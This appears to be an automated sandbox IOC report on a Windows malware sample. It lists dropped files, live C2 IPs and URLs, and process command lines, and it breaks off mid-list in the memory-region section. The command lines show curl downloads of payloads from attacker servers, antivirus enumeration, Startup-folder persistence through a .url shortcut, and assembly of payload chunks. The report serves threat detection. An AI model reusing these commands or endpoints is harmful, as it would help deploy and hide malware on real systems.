IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js
ASCII text, with no line terminators
dropped
 malicious
C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\InnoSphere Dynamics\l
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\303482\Either.pif
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\768032\Finish.com
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\768032\G
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Bailey
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Become
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Bt
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Considerations
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Eight
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Howard
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Los
OpenPGP Public Key
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Mental
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Norman
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Parts
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Rocky
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Samples
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Shepherd
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Showcase
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Vatican
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Vermont
data
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url
MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Temp\403
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\407
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Disco
data
dropped
C:\Users\user\AppData\Local\Temp\Feeling
ASCII text, with very long lines (1181), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Feeling.cmd
ASCII text, with very long lines (1181), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Seek
ASCII text, with very long lines (1312), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Seek.cmd
ASCII text, with very long lines (1312), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Subsection
data
dropped
C:\Users\user\AppData\Local\Temp\Weeks
data
dropped
C:\Users\user\AppData\Local\Temp\cbmaa
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dmgfe
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\fsqyf
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\fxhyo
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\gfdap
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\gjmcf
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\gtnez
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\hzpaz
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ixhzf
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jocox
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lkufr
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\qhiwq
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\sihmk
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\sirxu
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\slpug
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tlbry
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\vuevs
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\woejq
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\xvway
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ypalg
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\DolphinDumps\8CB16F
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\DolphinDumps\jvx
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe
PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
modified
C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 56 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
 malicious
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
malicious
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c md 768032
 malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
 malicious
C:\Users\user\AppData\Local\Temp\768032\Finish.com
Finish.com G
 malicious
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js"
malicious
C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
"C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
 malicious
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
 malicious
C:\Windows\SysWOW64\findstr.exe
findstr /C:"OS Name"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
 malicious
C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
"C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
azvw.exe -o xhwq.zip
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 104 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?gi
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=6h
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=8
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=7
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=6
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=5
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=60%
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=6Q
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=31
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=6T
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=7wk0
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?uvyw=2
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.%
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?uvyw=6
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=6c
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46
178.215.224.74
 malicious
http://178.215.224.74/v10/ukyh.#
unknown
 malicious
http://178.215.224.74/v10/ukyh.c
unknown
 malicious
http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2
178.215.224.74
 malicious
http://www.sysinternals.com
unknown
http://www.autoitscript.com/autoit3/X
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://www.autoitscript.com/autoit3/
unknown
http://www.info-zip.org/zip-bug.html;
unknown
ftp://ftp.info-zip.org/pub/infozip
unknown
http://178.215.224.252/v10/ukyh
unknown
http://178.215.224.252/v10/ukyh.php?jspo=6
178.215.224.252
http://www.info-zip.org/
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
EaUMrTLEnhJoi.EaUMrTLEnhJoi
unknown

IPs

IP
Domain
Country
Malicious
178.215.224.74
unknown
Germany
malicious
178.215.224.252
unknown
Germany

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
7C2000
heap
page read and write
33F6000
heap
page read and write
3ACA000
trusted library allocation
page read and write
929E3FF000
stack
page read and write
7B6000
heap
page read and write
3A70000
trusted library allocation
page read and write
2E3F000
stack
page read and write
29C2000
heap
page read and write
27CF000
stack
page read and write
7D8000
heap
page read and write
3B20000
trusted library allocation
page read and write
3790000
heap
page read and write
39A1000
trusted library allocation
page read and write
2E36000
heap
page read and write
29C2000
heap
page read and write
2ECB000
heap
page read and write
4A65000
heap
page read and write
1010000
trusted library allocation
page read and write
29DD000
stack
page read and write
3392000
trusted library allocation
page read and write
3D3E000
trusted library allocation
page read and write
3D2D000
trusted library allocation
page read and write
3D31000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
60D000
stack
page read and write
29E4000
heap
page read and write
33B9000
heap
page read and write
33D6000
heap
page read and write
38A1000
trusted library allocation
page read and write
32FD000
stack
page read and write
929E4FF000
stack
page read and write
495F000
stack
page read and write
2A14000
heap
page read and write
29E9000
heap
page read and write
2CC0000
heap
page read and write
353F000
stack
page read and write
3291000
heap
page read and write
3CED000
trusted library allocation
page read and write
770000
trusted library allocation
page read and write
7C2000
heap
page read and write
3370000
heap
page read and write
7B6000
heap
page read and write
33D6000
heap
page read and write
2FE0000
heap
page read and write
2EE7000
heap
page read and write
3399000
trusted library allocation
page read and write
354A000
heap
page read and write
2277243A000
heap
page read and write
395D000
trusted library allocation
page read and write
3399000
trusted library allocation
page read and write
527E000
stack
page read and write
22772401000
heap
page read and write
B2F000
stack
page read and write
3FFF000
trusted library allocation
page read and write
32FD000
stack
page read and write
29C2000
heap
page read and write
2EA2000
heap
page read and write
29E9000
heap
page read and write
3C5000
heap
page read and write
38A1000
trusted library allocation
page read and write
29C2000
heap
page read and write
409000
unkown
page readonly
2856000
heap
page read and write
434000
unkown
page read and write
63E000
stack
page read and write
38A1000
trusted library allocation
page read and write
7DC000
heap
page read and write
3C57000
trusted library allocation
page read and write
22772447000
heap
page read and write
29C2000
heap
page read and write
2B39000
heap
page read and write
400000
unkown
page readonly
3D8C000
trusted library allocation
page read and write
22772417000
heap
page read and write
2ED0000
heap
page read and write
357F000
stack
page read and write
26FF000
stack
page read and write
49DF000
stack
page read and write
29C2000
heap
page read and write
3981000
trusted library allocation
page read and write
29EC000
heap
page read and write
34FD000
heap
page read and write
B64000
heap
page read and write
2ADA000
heap
page read and write
3506000
heap
page read and write
2872000
heap
page read and write
3C47000
trusted library allocation
page read and write
3D6B000
trusted library allocation
page read and write
4088000
trusted library allocation
page read and write
31E1000
heap
page read and write
3C4D000
trusted library allocation
page read and write
3DE8000
trusted library allocation
page read and write
29D0000
heap
page read and write
35DD000
heap
page read and write
3BAA000
trusted library allocation
page read and write
3205000
heap
page read and write
2A4F000
stack
page read and write
2F90000
heap
page read and write
2D00000
heap
page read and write
28B0000
heap
page read and write
354E000
heap
page read and write
3E1F000
trusted library allocation
page read and write
3291000
heap
page read and write
384E000
stack
page read and write
2E4C000
stack
page read and write
2ED0000
heap
page read and write
289E000
stack
page read and write
2DFD000
heap
page read and write
29C2000
heap
page read and write
3C54000
trusted library allocation
page read and write
461000
unkown
page read and write
339F000
stack
page read and write
28F3000
heap
page read and write
2866000
heap
page read and write
3D4D000
trusted library allocation
page read and write
3502000
heap
page read and write
3C43000
trusted library allocation
page read and write
36BC000
stack
page read and write
3CE5000
